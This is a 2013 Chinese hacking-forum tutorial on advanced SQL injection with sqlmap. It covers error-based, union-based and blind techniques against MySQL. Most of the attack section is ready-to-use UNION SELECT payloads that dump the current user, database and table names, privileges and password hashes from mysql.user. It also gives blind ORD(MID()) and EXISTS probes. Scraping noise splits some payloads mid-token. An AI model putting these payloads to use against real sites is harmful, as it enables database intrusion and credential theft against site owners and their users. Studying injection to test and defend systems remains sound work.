中国网络渗透测试联盟

标题: sqlmap高级注入 [打印本页]
作者: admin    时间: 2013-7-16 20:31
标题: sqlmap高级注入
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。: M: n% R& j9 H$ y: E
0 d* S: t) N! Q! {
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表. x2 m6 _$ i7 j" _6 k- A+ }

' h( Y6 d. y! v  T+ k2 B% e; c) J分类标准        分类        备注& m; g( e; _% {/ P7 G3 K, ~0 `3 Z" Z
按字段类型        整型注入,字符型注入        8 c. `% g% v' n& I' r
按出现的位置        get注入,post注入,cookie注入,http header注入       
% i. i1 l5 L2 i0 h1 o8 l2 j. r然而高级注入是这样的
! ^5 h3 x# n/ v4 d/ }! Q . F; k/ _% |. M; e
高级注入分类        条件
2 a& q+ R) r* `6 Q& berror-based sql        数据库的错误回显可以返回,存在数据库,表结构
6 [* ]4 b" y" [6 Q/ K) y" @union-based sql        能够使用union,存在数据库,表结构
2 C+ L3 |' n" Z8 Ablind sql        存在注入
. \/ Z2 h6 S3 \3 N  c4 e+ c2 P( V我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。' b4 S6 z+ d! r9 b8 v

9 x8 V/ w* j! ]. z好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
! }7 c  C; P/ k9 G6 J   Y7 `8 s, V# h! _$ v$ f
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
6 J: Z- T; O/ x
0 d. a( w4 Q: {7 k: a2 m" j这里用mysql说明  Z/ L1 q; a% y& W. m- F4 H
1 z4 T& w3 n2 Q& }' ^
e注入坛子里很多了,请看戳我或者再戳我, G/ W$ M0 k- e4 k# q

* U% U6 k3 v: S; q5 Pu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的4 z6 u. G. X, I" t6 \

2 ]& M/ [, h* T8 ^, g7 Q5 M获取当前数据库用户名
0 i- k" X- J9 t 5 `# o# {" \% q3 o: E( {3 k+ G! A
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C$ X7 s5 B$ f. y( d" ?
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
& q; S& Y/ o( w( c0 yL, NULL#
  a7 b( H; D, Q5 _5 u, v- ~注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
! E( D( W6 |5 b2 q& N2 o  D7 | . S9 i1 k  m* g5 L7 P# U
获取数据库名
( G9 `2 t4 {4 z1 O & w% @' W# y( G
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
) Q4 W3 n6 ?! l4 r- x5 d获取所有用户名$ n) z& J' w' a9 o' O/ z' C# G$ u
% ?+ L; G7 g$ s2 @
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#$ q  L' x, P$ c, @5 `# R
查看当前用户权限
. X. R. Q' J9 M$ k1 j5 \( X * e5 j+ p  W$ T. {  {* J9 ?" ?
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#, w* }, n% `3 u% }& A; J
尝试获取密码,当然需要有能读mysql数据库的权限
0 Y* z+ X7 s6 g; `# _ 7 b' i1 w' N- e
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
8 n- B4 u4 k# ~3 k+ x获取表名,limit什么的自己搞啦
% L, p* j: N$ q# m7 r
! k% c& i" o+ X. F& Q" n  MUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
) q! y) Z1 I/ R获取字段名及其类型
4 V# ?. h& `) J* ?UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
3 w' \8 j, I/ j! ^$ i 0 w$ B! v. n2 J- |
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。0 \1 G0 A+ N1 `* v* B( h! ?

6 G; q5 E, O) d: ~' D7 y( S如:5 K' O, _/ L7 b9 R
获取当前用户名
/ v3 F/ I8 V) B7 h6 H8 V
  f* E: ?7 G& m7 o8 rAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116( z% W8 ]& Y/ s
获取当前数据库
  V9 }. W9 R% k
- W) A. p$ R7 V* C: T! [1 v5 tAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106+ b2 t. o+ `6 j6 G
获取表名' v( v; n8 y6 O2 l
8 t2 D. ]- l- i
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51) J  }) B4 V( Q+ h+ M
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。' A7 k3 ]9 r8 a  s1 T' \9 S
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。$ Z2 v8 E1 k. A" J9 {% c( X
爆表' p/ e1 e7 L5 O, `
9 M# v# ^' J, e9 Y
AND EXISTS(select * from table)6 c, D5 t9 \, w+ n' H! f
爆字段
8 U: m5 m3 g8 N
% R" \. v) d; j- vAND EXISTS(select pwd from table). U) p. `$ v( _  b9 P: s1 f: e' m3 O
盲注的变化就比较多了,由于篇幅,只是举个例子而已。8 ~, m3 C/ p* N0 k9 f  {
; y8 i/ r2 y5 a8 K: m' V$ y0 Q: E. n
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。# x+ [6 f. j" T$ f: X2 h7 X




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2